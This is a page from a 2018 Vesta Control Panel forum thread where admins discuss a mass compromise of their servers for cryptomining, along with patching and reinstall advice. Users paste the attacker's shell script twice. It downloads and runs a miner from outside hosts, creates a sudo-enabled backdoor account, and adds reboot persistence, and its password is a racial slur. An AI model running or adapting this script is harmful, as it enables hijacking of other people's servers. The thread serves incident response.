Vesta Control Panel - Forum

Community Forum
https://forum.vestacp.com/

have been HACKED ! by xaxaxa.eu

https://forum.vestacp.com/viewtopic.php?t=17183

Page 2 of 5

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:24 am
by ScIT
Spheerys wrote: Tue Jun 26, 2018 7:21 am A new line was added to /etc/passwd :

Code: Select all

sysroot:x:1007:1008::/home/sysroot:/bin/sh
And /etc/group :

Code: Select all

sysroot:x:1008:
and /etc/gshadow :

Code: Select all

sysroot:!::
and /etc/subuid :

Code: Select all

and /etc/shadow :

Code: Select all

sysroot:$6$A7jC1gBu$3kMVa4OoMDiyw8zLX7Y9X7kmyUNH9cbR6x6tSeNATJ.NlXEBE/DdFnKFCryHJAxHFOIFkUQmyKodtHLJH.QF.:17708:0:99999:7:::
/etc/sudoers (sic!!) :

Code: Select all

sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
sysroot ALL=(ALL) ALL
Like thread owner has informed in his first post, the following script was executed:

Code: Select all

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi
This would explain your created lines.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:25 am
by aximus
I've updated the system without errors. But still i'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:29 am
by ScIT
aximus wrote: Tue Jun 26, 2018 7:25 am I've updated the system without errors. But still i'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?
did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:31 am
by Spheerys
ScIT wrote: Tue Jun 26, 2018 7:29 am If yes, please share the output of ./v-list-sys-vesta-updates.
In my case :

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:33 am
by ScIT
Spheerys wrote: Tue Jun 26, 2018 7:31 am
ScIT wrote: Tue Jun 26, 2018 7:29 am If yes, please share the output of ./v-list-sys-vesta-updates.
In my case :

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25
you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:34 am
by Spheerys
yes you are right.
Thanks !

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:57 am
by pksh71
Dear team,

We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.

hacker Installed xmrig minig software on our servers.

some servers also have a script called 'gcc' installed.
how can we get rid of this issue.

Regards

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:07 am
by jonny1960
also was hacked tonight by mining virus
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:11 am
by aximus
ScIT wrote: Tue Jun 26, 2018 7:29 am
did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.
I did exactly as you wrote.

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  20   amd64  no    2018-04-09
vesta-php    0.9.8  19   amd64  no    2018-01-23
vesta-nginx  0.9.8  20   amd64  no    2018-04-09
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:12 am
by ScIT
pksh71 wrote: Tue Jun 26, 2018 7:57 am Dear team,

We have around 120+ Servers running in Various DATA CENTERS across the world . out of these 110 Server have vestacp Installed. All the 110 Servers with vestacp installed is hacked for cpu concurrency mining by some unknown hacker.

hacker Installed xmrig minig software on our servers.

some servers also have a script called 'gcc' installed.
how can we get rid of this issue.

Regards
1. Update to actual patch level (0.9.8-22), this will fix the security issue but does .
2. In my point of view: Don't trust infected servers, so reinstall them. If you don't want to reinstall try to clear the system.
All times are UTC
Page 2 of 5

Powered by phpBB® Forum Software © phpBB Limited